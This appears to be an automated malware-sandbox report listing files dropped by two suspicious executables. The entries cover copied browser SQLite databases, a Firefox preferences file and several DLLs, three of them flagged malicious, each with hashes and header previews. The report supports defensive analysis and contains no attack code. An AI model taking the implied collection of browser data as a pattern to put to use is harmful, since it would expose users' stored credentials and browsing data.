                                                                                                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):40960
                                                                                                                                                                                                                                                            Entropy (8bit):0.8553638852307782
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                                                                                                            MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                                                                                                            SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                                                                                                            SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                                                                                                            SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1019671001\d0e32932f8.exe
                                                                                                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):49152
                                                                                                                                                                                                                                                            Entropy (8bit):0.8180424350137764
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                                                                                                                                            MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                                                                                                                                            SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                                                                                                                                            SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                                                                                                                                            SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1019671001\d0e32932f8.exe
                                                                                                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):114688
                                                                                                                                                                                                                                                            Entropy (8bit):0.9746603542602881
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                                                                                                            MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                                                                                                            SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                                                                                                            SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                                                                                                            SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1019671001\d0e32932f8.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1809), with CRLF line terminators
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):9862
                                                                                                                                                                                                                                                            Entropy (8bit):5.5294981214721135
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:192:qnaRt+YbBp6ihj4qyaaX86KakfGNBw8MJSl:yegquOcwV0
                                                                                                                                                                                                                                                            MD5:824B654832E313787953C52941C09765
                                                                                                                                                                                                                                                            SHA1:74814560FF5E244BC3B6ACA16313AE53553BCD50
                                                                                                                                                                                                                                                            SHA-256:1F7839E332B88E9F24361636F0C0AA5E52DDB8B04A8C5E21710F3796EE847EA7
                                                                                                                                                                                                                                                            SHA-512:4F7E39CBC0091CCE85569B1929FFF62F3F2CDB8DD7BCD47C7817671B2EEEB6B90EBE59515070ED726D7EE44A6DCEA6B52F09DF6AAE94AAB925AEB1FBD6527B30
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "57f16a19-e119-4073-bf01-28f88011f783");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696333830);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696333856);..user_pref("app.update.lastUpdateTime.xpi-signature-verification
                                                                                                                                                                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):1310720
                                                                                                                                                                                                                                                            Entropy (8bit):1.3073691797670222
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3072:5JCnRjDxImmaooCEYhlOe2Pp4mH45l6MFXDaFXpVv1L0Inc4lfEnogVsiJKrvrq:KooCEYhgYEL0In
                                                                                                                                                                                                                                                            MD5:92B88262C01E4745C66EDC417D0A7BFD
                                                                                                                                                                                                                                                            SHA1:910623EAB07D922AA7521FE64D8807764BE746CA
                                                                                                                                                                                                                                                            SHA-256:22932643254F0F9FB9D2F062C439585FD92386B113EB66207F32813C2B68A5AA
                                                                                                                                                                                                                                                            SHA-512:11BC08000266CB7613CFA46831E17FEDE559026597FE1B70EEE2A29671DA2A6F70656F174D819096FD99F4044C7789F71F346CC7867F6933C0395EDA9561D044
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:z3..........@..@.;...{..................<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@..........................................#.................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                            File Type:Extensible storage engine DataBase, version 0x620, checksum 0x41e27505, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):1310720
                                                                                                                                                                                                                                                            Entropy (8bit):0.42217234908464185
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:1536:ZSB2ESB2SSjlK/dvmdMrSU0OrsJzvdYkr3g16T2UPkLk+kTX/Iw4KKCzAkUk1kI6:Zaza/vMUM2Uvz7DO
                                                                                                                                                                                                                                                            MD5:DA7139A0C6EE3B48CF74752276289DE0
                                                                                                                                                                                                                                                            SHA1:610CE292F453B456855B1637DB6902D0FF790D46
                                                                                                                                                                                                                                                            SHA-256:DAF622113654A3E7B61F50025B29CB64581125F8651DEFBEAE50726D797E7647
                                                                                                                                                                                                                                                            SHA-512:A50097BFE271F4562BD56AEADF1AC347E4EC65F49DBFAEA6B3C86297C856B02DBD738943F82A4BD8916F6A2DF6666BF061B5DDE01D936859265A1C114CEF4A16
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:A.u.... .......A.......X\...;...{......................0.!..........{A.5....|..h.#.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........;...{...............................................................................................................................................................................................2...{..................................&y..5....|...................M..5....|...........................#......h.#.....................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):16384
                                                                                                                                                                                                                                                            Entropy (8bit):0.07642127281631163
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3:Owml/yYenb3ljn13a/n1w3vllcVO/lnlZMxZNQl:Owznx53qn1YOewk
                                                                                                                                                                                                                                                            MD5:7B93DDF84331257206F476376CA5C4CE
                                                                                                                                                                                                                                                            SHA1:34A0648D745A1F7AED39CAD903181C7939CD54B6
                                                                                                                                                                                                                                                            SHA-256:2FB09E556829D9F9E7DC9B34638CEE78D771FC325EB323E90384291543B3E427
                                                                                                                                                                                                                                                            SHA-512:D4B00FDD3EE0F674261B9EA8D4A3B4F31D1AB0811FFA932E0FF3B34ED7DDFCF22999B19BE12E02F452BB424B7708F53A2022BD065AA37DEB73EDFFD9EDEF1868
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:(.u......................................;...{..5....|.......{A..............{A......{A..........{A].................M..5....|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                            Process:C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exe
                                                                                                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):159744
                                                                                                                                                                                                                                                            Entropy (8bit):0.7873599747470391
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                                                                                                                                                                            MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                                                                                                                                                                            SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                                                                                                                                                                            SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                                                                                                                                                                            SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                            Process:C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exe
                                                                                                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):40960
                                                                                                                                                                                                                                                            Entropy (8bit):0.8553638852307782
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                                                                                                            MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                                                                                                            SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                                                                                                            SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                                                                                                            SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                            Process:C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exe
                                                                                                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 32768, file counter 2, database pages 9, cookie 0x6, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):294912
                                                                                                                                                                                                                                                            Entropy (8bit):0.08436842005578409
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:192:5va0zkVmvQhyn+Zoz679fqlQbGhMHPaVAL23vIn:51zkVmvQhyn+Zoz67n
                                                                                                                                                                                                                                                            MD5:2CD2840E30F477F23438B7C9D031FC08
                                                                                                                                                                                                                                                            SHA1:03D5410A814B298B068D62ACDF493B2A49370518
                                                                                                                                                                                                                                                            SHA-256:49F56AAA16086F2A9DB340CC9A6E8139E076765C1BFED18B1725CC3B395DC28D
                                                                                                                                                                                                                                                            SHA-512:DCDD722C3A8AD79265616ADDDCA208E068E4ECEBE8820E4ED16B1D1E07FD52EB3A59A22988450071CFDA50BBFF7CB005ADF05A843DA38421F28572F3433C0F19
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:SQLite format 3......@ ..........................................................................j......z<.{...{.{a{.z.z<z.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                            Process:C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exe
                                                                                                                                                                                                                                                            File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):98304
                                                                                                                                                                                                                                                            Entropy (8bit):0.08235737944063153
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                                                                                                                                                            MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                                                                                                                                                            SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                                                                                                                                                            SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                                                                                                                                                            SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                            Process:C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exe
                                                                                                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):49152
                                                                                                                                                                                                                                                            Entropy (8bit):0.8180424350137764
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                                                                                                                                            MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                                                                                                                                            SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                                                                                                                                            SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                                                                                                                                            SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                            Process:C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exe
                                                                                                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):114688
                                                                                                                                                                                                                                                            Entropy (8bit):0.9746603542602881
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                                                                                                            MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                                                                                                            SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                                                                                                            SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                                                                                                            SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                            Process:C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exe
                                                                                                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):106496
                                                                                                                                                                                                                                                            Entropy (8bit):1.1358696453229276
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                                                                                                            MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                                                                                                            SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                                                                                                            SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                                                                                                            SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                            Process:C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exe
                                                                                                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):126976
                                                                                                                                                                                                                                                            Entropy (8bit):0.47147045728725767
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                                                                                                                                                                            MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                                                                                                                                                                            SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                                                                                                                                                                            SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                                                                                                                                                                            SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1019671001\d0e32932f8.exe
                                                                                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):685392
                                                                                                                                                                                                                                                            Entropy (8bit):6.872871740790978
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                                                                                                                                                                                                                                                            MD5:550686C0EE48C386DFCB40199BD076AC
                                                                                                                                                                                                                                                            SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                                                                                                                                                                                                                                                            SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                                                                                                                                                                                                                                                            SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1019671001\d0e32932f8.exe
                                                                                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):608080
                                                                                                                                                                                                                                                            Entropy (8bit):6.833616094889818
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                                                                                                                                                                                                                                                            MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                                                                                                                                                                                                                                                            SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                                                                                                                                                                                                                                                            SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                                                                                                                                                                                                                                                            SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1019671001\d0e32932f8.exe
                                                                                                                                                                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):450024
                                                                                                                                                                                                                                                            Entropy (8bit):6.673992339875127
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                                                                                                                                                                                                                                                            MD5:5FF1FCA37C466D6723EC67BE93B51442
                                                                                                                                                                                                                                                            SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                                                                                                                                                                                                                                                            SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                                                                                                                                                                                                                                                            SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1019671001\d0e32932f8.exe
                                                                                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):2046288
                                                                                                                                                                                                                                                            Entropy (8bit):6.787733948558952
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
                                                                                                                                                                                                                                                            MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
                                                                                                                                                                                                                                                            SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
                                                                                                                                                                                                                                                            SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
                                                                                                                                                                                                                                                            SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
                                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                            Reputation:unknown
